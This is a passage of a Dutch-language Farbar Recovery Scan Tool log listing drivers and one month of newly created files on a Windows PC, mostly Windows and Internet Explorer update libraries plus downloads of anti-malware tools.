S3 fwlanusbn; C:\Windows\System32\DRIVERS\fwlanusbn.sys [552704 2009-03-20] (AVM GmbH) [Bestand niet getekend]
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [274696 2014-11-15] (Microsoft Corporation)
R1 MpKsl1f8ee86b; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{59E671C3-534C-4383-B36F-779577A76229}\MpKsl1f8ee86b.sys [44928 2016-01-31] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124560 2014-11-15] (Microsoft Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [526392 2011-08-21] () [Bestand niet getekend]
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [Bestand niet getekend]
U3 akdkd18u; C:\Windows\System32\Drivers\akdkd18u.sys [0 ] (Adaptec, Inc.) <==== AANDACHT (nul byte bestand/map)
S3 ALSysIO; \??\C:\Users\Thomas\AppData\Local\Temp\ALSysIO64.sys [X]
S3 CV2K1; system32\DRIVERS\cv2k1.sys [X]

==================== NetSvcs (gefilterd) ===================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)


==================== Een Maand Aangemaakt bestanden en mappen ========

(Als een item is opgenomen in de fixlist, het bestand/map wordt verplaatst.)

2016-01-31 15:53 - 2016-01-31 15:53 - 00026460 _____ C:\Users\Thomas\Desktop\FRST.txt
2016-01-31 15:52 - 2016-01-31 15:53 - 00000000 ____D C:\FRST
2016-01-31 15:51 - 2016-01-31 15:51 - 02370560 _____ (Farbar) C:\Users\Thomas\Desktop\FRST64.exe
2016-01-31 13:04 - 2016-01-31 13:04 - 22908888 _____ (Malwarebytes ) C:\Users\Thomas\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-30 21:58 - 2016-01-30 21:58 - 00000000 ____D C:\Users\Farah\AppData\Local\GWX
2016-01-30 21:52 - 2016-01-30 21:56 - 00000000 ____D C:\Users\Farah\AppData\Local\Google
2016-01-30 16:58 - 2016-01-30 16:58 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-30 16:41 - 2016-01-30 16:41 - 00000000 _____ C:\autoexec.bat
2016-01-30 16:40 - 2016-01-31 12:01 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Enigma Software Group
2016-01-30 16:39 - 2016-01-30 16:39 - 00022704 _____ C:\Windows\system32\Drivers\EsgScanner.sys
2016-01-30 16:38 - 2016-01-30 16:38 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Thomas\Downloads\SpyHunter-Installer.exe
2016-01-30 15:25 - 2015-12-11 19:57 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 01568768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 01325056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00902144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-30 15:25 - 2015-12-08 22:54 - 00739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00541184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-30 15:25 - 2015-12-08 22:54 - 00154112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00970240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00509952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-30 15:25 - 2015-12-08 22:53 - 00153600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-30 15:25 - 2015-12-08 22:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-30 15:25 - 2015-12-08 22:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-01-30 15:25 - 2015-12-08 22:53 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-01-30 15:25 - 2015-12-08 20:07 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01955328 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01575424 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01307136 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 01232896 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01153024 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 01026048 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00978944 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00666112 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00642048 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00292352 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00224768 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-30 15:25 - 2015-12-08 20:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-30 15:25 - 2015-12-08 20:07 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-01-30 15:25 - 2015-12-08 20:06 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-30 15:25 - 2015-12-08 20:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-01-30 15:25 - 2015-12-08 19:54 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-30 15:25 - 2015-12-08 19:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-01-30 15:24 - 2015-12-24 00:13 - 00387784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-01-30 15:24 - 2015-12-23 23:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-01-30 15:24 - 2015-12-12 19:54 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-30 15:24 - 2015-12-12 19:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-30 15:24 - 2015-12-12 19:30 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-01-30 15:24 - 2015-12-12 19:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-30 15:24 - 2015-12-12 19:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-30 15:24 - 2015-12-12 19:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-01-30 15:24 - 2015-12-12 19:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-30 15:24 - 2015-12-12 19:07 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-01-30 15:24 - 2015-12-12 19:03 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-01-30 15:24 - 2015-12-12 19:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-30 15:24 - 2015-12-12 19:02 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-01-30 15:24 - 2015-12-12 18:55 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-01-30 15:24 - 2015-12-12 18:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-30 15:24 - 2015-12-12 18:49 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-30 15:24 - 2015-12-12 18:44 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-01-30 15:24 - 2015-12-12 18:40 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-01-30 15:24 - 2015-12-12 18:39 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-01-30 15:24 - 2015-12-12 18:37 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-01-30 15:24 - 2015-12-12 18:36 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-30 15:24 - 2015-12-12 18:36 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-01-30 15:24 - 2015-12-12 18:35 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-01-30 15:24 - 2015-12-12 18:33 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-30 15:24 - 2015-12-12 18:31 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-30 15:24 - 2015-12-12 18:30 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-01-30 15:24 - 2015-12-12 18:28 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-01-30 15:24 - 2015-12-12 18:27 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-30 15:24 - 2015-12-12 18:25 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-01-30 15:24 - 2015-12-12 18:23 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-30 15:24 - 2015-12-12 18:22 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-01-30 15:24 - 2015-12-12 18:21 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-01-30 15:24 - 2015-12-12 18:20 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-30 15:24 - 2015-12-12 18:19 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-30 15:24 - 2015-12-12 18:18 - 14457856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-30 15:24 - 2015-12-12 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-01-30 15:24 - 2015-12-12 18:12 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-01-30 15:24 - 2015-12-12 18:10 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-30 15:24 - 2015-12-12 18:10 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-30 15:24 - 2015-12-12 18:09 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-30 15:24 - 2015-12-12 18:08 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-01-30 15:24 - 2015-12-12 18:06 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-30 15:24 - 2015-12-12 18:02 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-30 15:24 - 2015-12-12 18:00 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-01-30 15:24 - 2015-12-12 18:00 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-30 15:24 - 2015-12-12 17:54 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-30 15:24 - 2015-12-12 17:42 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-30 15:24 - 2015-12-12 17:41 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-30 15:24 - 2015-12-12 17:38 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-30 15:24 - 2015-12-12 17:36 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-30 15:24 - 2015-12-08 22:53 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-30 15:24 - 2015-12-08 22:53 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksuser.dll
2016-01-30 15:24 - 2015-12-08 22:52 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-30 15:24 - 2015-12-08 22:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-30 15:24 - 2015-12-08 20:07 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\ksuser.dll
2016-01-30 15:24 - 2015-12-08 20:04 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-01-30 15:24 - 2015-12-08 19:11 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys
2016-01-30 15:24 - 2015-12-08 18:58 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-30 15:24 - 2015-11-17 02:11 - 00025024 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-30 15:24 - 2015-11-17 02:08 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00705536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-30 15:24 - 2015-11-17 02:08 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-30 15:24 - 2015-11-16 21:17 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-30 15:23 - 2015-12-30 20:08 - 05572544 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-30 15:23 - 2015-12-30 20:08 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-30 15:23 - 2015-12-30 20:08 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-01-30 15:23 - 2015-12-30 20:05 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-01-30 15:23 - 2015-12-30 20:02 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-01-30 15:23 - 2015-12-30 20:01 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-01-30 15:23 - 2015-12-30 20:00 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-30 15:23 - 2015-12-30 19:59 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-01-30 15:23 - 2015-12-30 19:58 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-30 15:23 - 2015-12-30 19:58 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-01-30 15:23 - 2015-12-30 19:57 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-01-30 15:23 - 2015-12-30 19:55 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-30 15:23 - 2015-12-30 19:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
